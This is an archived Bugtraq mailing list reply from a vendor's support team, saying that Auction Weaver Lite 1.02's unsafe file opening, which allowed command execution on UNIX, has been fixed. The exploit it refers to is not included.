Bugtraq mailing list archives

Re: More problems with Auction Weaver & CGI Script Center.

From: CGI Script Center Support <support () cgiscriptcenter com>
Date: Sat, 2 Sep 2000 16:49:02 -0700

Auction Weaver Lite 1.02 was opening files to be read without using the READ
"<" command, which allowed outside commands to be executed on UNIX platforms
using Xterm.

All files being opened for reading have now been updated.

I have only been able to check the below exploit on the shareware
version, but I strongly believe that the PRO version is exploitable
as well.

No Professional version is yet available.

The below exploit should no longer be valid.

CGI Script Center Support
support () cgiscriptcenter com